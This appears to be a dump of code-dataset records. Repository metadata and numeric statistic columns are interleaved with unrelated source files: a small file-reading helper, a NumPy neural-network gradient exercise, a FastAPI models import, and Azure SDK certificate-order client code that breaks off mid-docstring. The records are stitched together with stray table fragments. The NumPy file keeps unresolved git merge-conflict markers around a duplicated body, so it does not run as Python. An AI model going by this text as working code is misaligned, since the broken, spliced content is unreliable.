] | null | null | null |
src/gybc/statuses.py
|
tblanarik/gycb
|
9481eadd5f9708a9c8d39cbe012ef8a8ba725ead
|
[
"MIT"
] | null | null | null |
import gybc
import os
def texts():
return open(os.path.join(gybc.GYBC_PATH, '..', '..', 'bin', 'archive.txt')).readlines()
| 25.4
| 91
| 0.637795
| 18
| 127
| 4.444444
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125984
| 127
| 5
| 91
| 25.4
| 0.720721
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
d7d68a4bd950b7a546c95f189fb301d4a126b969
| 1,362
|
py
|
Python
|
DeepLearning_from_Scratch/Chapter4_gradient_SimpleNet.py
|
taekwang94/code-exercise
|
cbba690d41b53a7e3800ea288f4b973a084f1359
|
[
"MIT"
] | 1
|
2020-08-04T02:59:58.000Z
|
2020-08-04T02:59:58.000Z
|
DeepLearning_from_Scratch/Chapter4_gradient_SimpleNet.py
|
taekwang94/code-exercise
|
cbba690d41b53a7e3800ea288f4b973a084f1359
|
[
"MIT"
] | 1
|
2020-01-30T01:38:58.000Z
|
2020-01-30T01:38:58.000Z
|
DeepLearning_from_Scratch/Chapter4_gradient_SimpleNet.py
|
taekwang94/code-exercise
|
cbba690d41b53a7e3800ea288f4b973a084f1359
|
[
"MIT"
] | 1
|
2020-01-30T01:34:25.000Z
|
2020-01-30T01:34:25.000Z
|
<<<<<<< HEAD
import sys,os
sys.path.append(os.pardir)
import numpy as np
from common.functions import softmax,cross_entropy_error
from common.gradient import numerical_gradient
class simple_Net:
def __init__(self):
self.W=np.random.rand(2,3) # 정규분포로 초기화
def predict(self,x):
return np.dot(x,self.W)
def loss(self,x,t):
z = self.predict(x)
y =softmax(z)
loss = cross_entropy_error(y,t)
return loss
net = simple_Net()
print(net.W)
x = np.array([0.6,0.9])
p = net.predict(x)
print(p)
np.argmax(p)
t= np.array([0,0,1])
net.loss(x,t)
f = lambda w: net.loss(x,t)
dw = numerical_gradient(f,net.W)
=======
import sys,os
sys.path.append(os.pardir)
import numpy as np
from common.functions import softmax,cross_entropy_error
from common.gradient import numerical_gradient
class simple_Net:
def __init__(self):
self.W=np.random.rand(2,3) # 정규분포로 초기화
def predict(self,x):
return np.dot(x,self.W)
def loss(self,x,t):
z = self.predict(x)
y =softmax(z)
loss = cross_entropy_error(y,t)
return loss
net = simple_Net()
print(net.W)
x = np.array([0.6,0.9])
p = net.predict(x)
print(p)
np.argmax(p)
t= np.array([0,0,1])
net.loss(x,t)
f = lambda w: net.loss(x,t)
dw = numerical_gradient(f,net.W)
>>>>>>> e8dc90c85b9519d31ca84678bd32c29f74538635
| 18.916667
| 56
| 0.651982
| 234
| 1,362
| 3.692308
| 0.222222
| 0.013889
| 0.078704
| 0.041667
| 0.949074
| 0.949074
| 0.949074
| 0.949074
| 0.949074
| 0.949074
| 0
| 0.042009
| 0.196035
| 1,362
| 71
| 57
| 19.183099
| 0.747032
| 0.01395
| 0
| 0.943396
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.150943
| null | null | 0.075472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d7dba90cd71205ebd9d8f1b4de1f07ed37df7f43
| 68
|
py
|
Python
|
users/app/models/__init__.py
|
Kludex/fastapi-microservices
|
4a89b254ed7ae023c2e3bf6421c9f5a0bc9e4408
|
[
"MIT"
] | 84
|
2021-04-19T07:11:23.000Z
|
2022-03-31T11:48:46.000Z
|
users/app/models/__init__.py
|
Bastien-BO/fastapi-microservices
|
ab8e2aaa999c22a4a2bb9b0a1e4796a3ed186fd8
|
[
"MIT"
] | 31
|
2021-04-19T20:29:56.000Z
|
2021-11-27T19:55:31.000Z
|
users/app/models/__init__.py
|
Bastien-BO/fastapi-microservices
|
ab8e2aaa999c22a4a2bb9b0a1e4796a3ed186fd8
|
[
"MIT"
] | 11
|
2021-05-18T15:28:15.000Z
|
2022-03-22T14:10:03.000Z
|
from app.models.items import Item
from app.models.users import User
| 22.666667
| 33
| 0.823529
| 12
| 68
| 4.666667
| 0.666667
| 0.25
| 0.464286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 68
| 2
| 34
| 34
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0be597bd2500ec808e9d4531a6ad0caf82d0a41b
| 51,467
|
py
|
Python
|
azure-mgmt-web/azure/mgmt/web/operations/certificate_orders_operations.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | 1
|
2017-10-29T15:14:35.000Z
|
2017-10-29T15:14:35.000Z
|
azure-mgmt-web/azure/mgmt/web/operations/certificate_orders_operations.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | null | null | null |
azure-mgmt-web/azure/mgmt/web/operations/certificate_orders_operations.py
|
Berryliao84/Python-Azure
|
a96ed6e8bbf4290372980a2919b31110da90b164
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
import uuid
from .. import models
class CertificateOrdersOperations(object):
"""CertificateOrdersOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
def get_certificate(
self, resource_group_name, certificate_order_name, name, custom_headers=None, raw=False, **operation_config):
"""Get certificate associated with the certificate order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param certificate_order_name: Certificate name
:type certificate_order_name: str
:param name: Certificate name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateOrderCertificate
<azure.mgmt.web.models.CertificateOrderCertificate>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateOrderCertificate', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update_certificate(
self, resource_group_name, certificate_order_name, name, key_vault_certificate, custom_headers=None, raw=False, **operation_config):
"""Associates a Key Vault secret to a certificate store that will be used
for storing the certificate once it's ready.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param certificate_order_name: Certificate name
:type certificate_order_name: str
:param name: Certificate name
:type name: str
:param key_vault_certificate: Key Vault secret csm Id
:type key_vault_certificate: :class:`CertificateOrderCertificate
<azure.mgmt.web.models.CertificateOrderCertificate>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateOrderCertificate
<azure.mgmt.web.models.CertificateOrderCertificate>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(key_vault_certificate, 'CertificateOrderCertificate')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateOrderCertificate', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete_certificate(
self, resource_group_name, certificate_order_name, name, custom_headers=None, raw=False, **operation_config):
"""Deletes the certificate associated with the certificate order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param certificate_order_name: Certificate name
:type certificate_order_name: str
:param name: Certificate name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_certificate(
self, resource_group_name, certificate_order_name, name, key_vault_certificate, custom_headers=None, raw=False, **operation_config):
"""Associates a Key Vault secret to a certificate store that will be used
for storing the certificate once it's ready.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param certificate_order_name: Certificate name
:type certificate_order_name: str
:param name: Certificate name
:type name: str
:param key_vault_certificate: Key Vault secret csm Id
:type key_vault_certificate: :class:`CertificateOrderCertificate
<azure.mgmt.web.models.CertificateOrderCertificate>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateOrderCertificate
<azure.mgmt.web.models.CertificateOrderCertificate>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(key_vault_certificate, 'CertificateOrderCertificate')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateOrderCertificate', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_certificate_order(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Get a certificate order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateOrder
<azure.mgmt.web.models.CertificateOrder>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateOrder', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update_certificate_order(
self, resource_group_name, name, certificate_distinguished_name, custom_headers=None, raw=False, **operation_config):
"""Create or update a certificate purchase order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate name
:type name: str
:param certificate_distinguished_name: Distinguished name to be used
for purchasing certificate
:type certificate_distinguished_name: :class:`CertificateOrder
<azure.mgmt.web.models.CertificateOrder>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateOrder
<azure.mgmt.web.models.CertificateOrder>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(certificate_distinguished_name, 'CertificateOrder')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateOrder', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def delete_certificate_order(
self, resource_group_name, name, custom_headers=None, raw=False, **operation_config):
"""Delete an existing certificate order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_certificate_order(
self, resource_group_name, name, certificate_distinguished_name, custom_headers=None, raw=False, **operation_config):
"""Create or update a certificate purchase order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate name
:type name: str
:param certificate_distinguished_name: Distinguished name to be used
for purchasing certificate
:type certificate_distinguished_name: :class:`CertificateOrder
<azure.mgmt.web.models.CertificateOrder>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateOrder
<azure.mgmt.web.models.CertificateOrder>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(certificate_distinguished_name, 'CertificateOrder')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateOrder', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_certificate_orders(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Get certificate orders in a resource group.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateOrderPaged
<azure.mgmt.web.models.CertificateOrderPaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.CertificateOrderPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.CertificateOrderPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def get_certificates(
self, resource_group_name, certificate_order_name, custom_headers=None, raw=False, **operation_config):
"""List all certificates associated with a certificate order (only one
certificate can be associated with an order at a time).
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param certificate_order_name: Certificate name
:type certificate_order_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`CertificateOrderCertificatePaged
<azure.mgmt.web.models.CertificateOrderCertificatePaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.CertificateOrderCertificatePaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.CertificateOrderCertificatePaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
def reissue_certificate_order(
self, resource_group_name, name, reissue_certificate_order_request, custom_headers=None, raw=False, **operation_config):
"""Reissue an existing certificate order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate name
:type name: str
:param reissue_certificate_order_request: Reissue parameters
:type reissue_certificate_order_request:
:class:`ReissueCertificateOrderRequest
<azure.mgmt.web.models.ReissueCertificateOrderRequest>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/reissue'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(reissue_certificate_order_request, 'ReissueCertificateOrderRequest')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def renew_certificate_order(
self, resource_group_name, name, renew_certificate_order_request, custom_headers=None, raw=False, **operation_config):
"""Renew an existing certificate order.
:param resource_group_name: Azure resource group name
:type resource_group_name: str
:param name: Certificate name
:type name: str
:param renew_certificate_order_request: Renew parameters
:type renew_certificate_order_request:
:class:`RenewCertificateOrderRequest
